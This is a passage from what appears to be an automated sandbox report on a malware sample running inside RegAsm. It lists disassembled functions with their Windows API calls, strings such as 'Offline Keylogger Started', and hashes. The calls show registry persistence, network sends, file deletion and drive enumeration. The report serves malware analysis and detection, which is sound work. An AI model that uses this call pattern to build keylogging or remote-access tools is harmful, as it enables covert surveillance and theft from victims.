                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                • String ID: xpF
                                                                • API String ID: 1852769593-354647465
                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1309 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1320 41b3ad-41b3bc call 4135e1 1309->1320 1321 41b3ee-41b3f7 1309->1321 1325 41b3c1-41b3d8 call 401fab StrToIntA 1320->1325 1323 41b400 1321->1323 1324 41b3f9-41b3fe 1321->1324 1326 41b405-41b410 call 40537d 1323->1326 1324->1326 1331 41b3e6-41b3e9 call 401fd8 1325->1331 1332 41b3da-41b3e3 call 41cffa 1325->1332 1331->1321 1332->1331
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                • API String ID: 1866151309-2070987746
                                                                • Opcode ID: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                • Opcode Fuzzy Hash: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1383 40a6b0-40a6c0 1384 40a6c6-40a6c8 1383->1384 1385 40a75d-40a760 1383->1385 1386 40a6cb-40a6f1 call 401f04 CreateFileW 1384->1386 1389 40a731 1386->1389 1390 40a6f3-40a701 GetFileSize 1386->1390 1393 40a734-40a738 1389->1393 1391 40a703 1390->1391 1392 40a728-40a72f CloseHandle 1390->1392 1394 40a705-40a70b 1391->1394 1395 40a70d-40a714 1391->1395 1392->1393 1393->1386 1396 40a73a-40a73d 1393->1396 1394->1392 1394->1395 1398 40a716-40a718 call 40b117 1395->1398 1399 40a71d-40a722 Sleep 1395->1399 1396->1385 1397 40a73f-40a746 1396->1397 1397->1385 1400 40a748-40a758 call 409097 call 40a1b4 1397->1400 1398->1399 1399->1392 1400->1385
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                • String ID: XQG
                                                                • API String ID: 1958988193-3606453820
                                                                • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                • String ID: Offline Keylogger Started
                                                                • API String ID: 465354869-4114347211
                                                                • Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                • Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137E1
                                                                • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorLastMutex
                                                                • String ID: SG
                                                                • API String ID: 1925916568-3189917014
                                                                • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                Function 0044F45D Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F461
                                                                • _free.LIBCMT ref: 0044F49A
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F4A1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnvironmentStrings$Free_free
                                                                • String ID:
                                                                • API String ID: 2716640707-0
                                                                • Opcode ID: 0f2961337cf6473c9b59c8633065eebaee8da3dc7e8e50693e042ad6422b7f19
                                                                • Instruction ID: 0fde98e0ac238faa149cd6f420f555edc5ad685e5938876998fddc3cfa248eb7
                                                                • Opcode Fuzzy Hash: 0f2961337cf6473c9b59c8633065eebaee8da3dc7e8e50693e042ad6422b7f19
                                                                • Instruction Fuzzy Hash: 41E0E537545A226BB211323A6C49D6F2A58CFD27B6726003BF40486242EE288D0641BA
                                                                Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                                • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID:
                                                                • API String ID: 1818849710-0
                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: pQG
                                                                • API String ID: 176396367-3769108836
                                                                • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00446227
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap$_free
                                                                • String ID:
                                                                • API String ID: 1482568997-0
                                                                • Opcode ID: 1f917527c9cd9112a4c2ab4db5d8ca91a49e76957baa276bc02c381a5932faf2
                                                                • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                • Opcode Fuzzy Hash: 1f917527c9cd9112a4c2ab4db5d8ca91a49e76957baa276bc02c381a5932faf2
                                                                • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEventStartupsocket
                                                                • String ID:
                                                                • API String ID: 1953588214-0
                                                                • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                Function 00450154 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                • _free.LIBCMT ref: 004501C0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap_free
                                                                • String ID:
                                                                • API String ID: 614378929-0
                                                                • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                                                • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779
                                                                Function 00445B74 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID:
                                                                • API String ID: 724789610-0
                                                                • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: send
                                                                • String ID:
                                                                • API String ID: 2809346765-0
                                                                • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725

                                                                Non-executed Functions

                                                                Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
